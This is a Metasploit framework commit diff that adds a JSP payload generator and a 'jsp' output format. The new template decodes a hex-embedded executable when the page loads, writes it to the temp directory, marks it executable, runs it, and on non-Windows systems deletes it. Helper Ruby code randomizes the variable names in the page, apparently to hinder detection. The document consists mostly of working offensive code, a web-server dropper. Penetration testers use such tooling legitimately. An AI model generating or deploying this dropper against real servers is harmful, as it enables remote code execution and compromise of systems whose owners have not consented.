Land rapid7#7283, add jsp payload generator

dmohanty-r7 · dmohanty-r7 · commit 4c4f2e45d62c · 2016-09-16T14:37:59.000-05:00
diff --git a/data/templates/scripts/to_exe.jsp.template b/data/templates/scripts/to_exe.jsp.template
@@ -0,0 +1,38 @@
+<%%@ page import="java.io.*" %%>
+<%%
+  String %{var_payload} = "%{payload}";
+  String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
+
+  if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) {
+    %{var_exepath} = %{var_exepath}.concat(".exe");
+  }
+
+  int %{var_payloadlength} = %{var_payload}.length();
+  byte[] %{var_bytes} = new byte[%{var_payloadlength}/2];
+  for (int %{var_counter} = 0; %{var_counter} < %{var_payloadlength}; %{var_counter} += 2) {
+    %{var_bytes}[%{var_counter} / 2] = (byte) ((Character.digit(%{var_payload}.charAt(%{var_counter}), 16) << 4)
+                                              + Character.digit(%{var_payload}.charAt(%{var_counter}+1), 16));
+  }
+
+  FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
+  %{var_outputstream}.write(%{var_bytes});
+  %{var_outputstream}.flush();
+  %{var_outputstream}.close();
+
+  if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
+    String[] %{var_fperm} = new String[3];
+    %{var_fperm}[0] = "chmod";
+    %{var_fperm}[1] = "+x";
+    %{var_fperm}[2] = %{var_exepath};
+    Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
+    if (%{var_proc}.waitFor() == 0) {
+      %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
+    }
+
+    File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
+  } else {
+    String[] %{var_exepatharray} = new String[1];
+    %{var_exepatharray}[0] = %{var_exepath};
+    Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
+  }
+%%>
diff --git a/data/templates/scripts/to_exe_jsp.war.template b/data/templates/scripts/to_exe_jsp.war.template
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
@@ -1407,6 +1407,40 @@ def self.to_powershell_hta(framework, arch, code)
     read_replace_script_template("to_powershell.hta.template", hash_sub)
   end
 
+  def self.to_jsp(exe)
+    hash_sub = {}
+    hash_sub[:var_payload]       = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_exepath]       = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_outputstream]  = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_payloadlength] = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_bytes]         = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_counter]       = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_exe]           = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_proc]          = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_fperm]         = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_fdel]          = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_exepatharray]  = Rex::Text.rand_text_alpha(rand(8)+8)
+
+    payload_hex = exe.unpack('H*')[0]
+    hash_sub[:payload]           = payload_hex
+
+    read_replace_script_template("to_exe.jsp.template", hash_sub)
+  end
+
+  # Creates a Web Archive (WAR) file containing a jsp page and hexdump of a
+  # payload.  The jsp page converts the hexdump back to a normal binary file
+  # and places it in the temp directory. The payload file is then executed.
+  #
+  # @see to_war
+  # @param exe [String] Executable to drop and run.
+  # @param opts (see to_war)
+  # @option opts (see to_war)
+  # @return (see to_war)
+  def self.to_jsp_war(exe, opts = {})
+    template = self.to_jsp(exe)
+    self.to_war(template, opts)
+  end
+
   def self.to_win32pe_vbs(framework, code, opts = {})
     to_exe_vbs(to_win32pe(framework, code, opts), opts)
   end
@@ -1500,52 +1534,6 @@ def self.to_war(jsp_raw, opts = {})
     zip.pack
   end
 
-  # Creates a Web Archive (WAR) file containing a jsp page and hexdump of a
-  # payload.  The jsp page converts the hexdump back to a normal binary file
-  # and places it in the temp directory. The payload file is then executed.
-  #
-  # @see to_war
-  # @param exe [String] Executable to drop and run.
-  # @param opts (see to_war)
-  # @option opts (see to_war)
-  # @return (see to_war)
-  def self.to_jsp_war(exe, opts = {})
-    # begin <payload>.jsp
-    hash_sub = {}
-    hash_sub[:var_hexpath]       = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_exepath]       = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_data]          = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_inputstream]   = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_outputstream]  = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_numbytes]      = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_bytearray]     = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_bytes]         = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_counter]       = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_char1]         = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_char2]         = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_comb]          = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_exe]           = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_hexfile]       = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_proc]          = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_fperm]         = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_fdel]          = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_exepatharray]  = Rex::Text.rand_text_alpha(rand(8)+8)
-
-    # Specify the payload in hex as an extra file..
-    payload_hex = exe.unpack('H*')[0]
-    opts.merge!(
-      {
-        :extra_files =>
-          [
-            [ "#{hash_sub[:var_hexfile]}.txt", payload_hex ]
-          ]
-      })
-
-    template = read_replace_script_template("to_exe_jsp.war.template", hash_sub)
-
-    self.to_war(template, opts)
-  end
-
   # Creates a .NET DLL which loads data into memory
   # at a specified location with read/execute permissions
   #    - the data will be loaded at: base+0x2065
@@ -2221,6 +2209,12 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
     when 'loop-vbs'
       exe = exe = to_executable_fmt(framework, arch, plat, code, 'exe-small', exeopts)
       Msf::Util::EXE.to_exe_vbs(exe, exeopts.merge({ :persist => true }))
+    when 'jsp'
+      arch ||= [ ARCH_X86 ]
+      tmp_plat = plat.platforms if plat
+      tmp_plat ||= Msf::Module::PlatformList.transform('win')
+      exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, code, exeopts)
+      Msf::Util::EXE.to_jsp(exe)
     when 'war'
       arch ||= [ ARCH_X86 ]
       tmp_plat = plat.platforms if plat
@@ -2258,6 +2252,7 @@ def self.to_executable_fmt_formats
       "exe-small",
       "hta-psh",
       "jar",
+      "jsp",
       "loop-vbs",
       "macho",
       "msi",
